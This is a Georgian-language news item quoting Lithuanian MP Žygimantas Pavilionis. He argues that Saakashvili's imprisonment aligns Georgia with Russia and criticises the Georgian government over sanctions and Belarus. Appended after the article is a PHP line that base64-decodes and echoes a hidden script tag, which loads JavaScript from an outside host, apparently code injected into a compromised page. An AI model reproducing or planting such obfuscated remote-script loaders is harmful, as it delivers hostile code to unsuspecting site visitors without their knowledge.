celsiusi
ავერსი შნაიდერი
"პრეზიდენტ სააკაშვილის ციხეში ჩასმა ნიშნავს საოკუპაციო ხაზის იმ მხარეს დგომას, სადაც რუსეთი დგას" - ამის შესახებ ლიეტუვის სეიმის წევრმა ჟიგიმანტას პავილიონისმა "მთავარ არხთან" ისაუბრა.
 
"რა თქმა უნდა, ჩვენ ყურადღებით უნდა დავაკვირდეთ რომ არ იყოს სანქციებისთვის გვერდის ავლის მცდელობები და ასევე იმის მცდელობები, რომ რუსეთს ვინმე დაეხმაროს. თავად ის ფაქტი, რომ საქართველო არ შეუერთდა ბევრ მნიშვნელოვან სანქციას, მიანიშნებს იმაზე, რომ რაღაცა არ არის ისე როგორც უნდა იყოს. ეს შესამჩნევი გახდა ჯერ კიდევ მაშინ, როდესაც ბელარუსში თვითმფრინავი გაიტაცეს და მინსკში იძულებით დასვეს. მაშინ ნაცვლად იმისა, რომ ბელარუსისთვის დაწესებულ სანქციებს შეერთებოდნენ, თქვენმა მთავრობამ ბელარუსის უშიშროებასთან შეთანხმება გააღრმავა.
 
რომ აღარაფერი ვთქვათ სხვა ფაქტებზე - პოლიტიკური ოპონენტების დევნასა და იმ პრეზიდენტის ციხეში ჩასმაზე, რომელმაც საქართველო ევროინტეგრაციის გზაზე ლიდერად აქცია. ეს მაშინ ხდება, როდესაც საქართველოს ტერიტორიები ოკუპირებულია და პრეზიდენტ სააკაშვილის ციხეში ჩასმა ჩემთვის და ბევრი ადამიანისთვის ნიშნავს ამ საოკუპაციო ხაზის იმ მხარეს დგომას, სადაც რუსეთი დგას" - ამბობს პავილიონისი. 
643
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");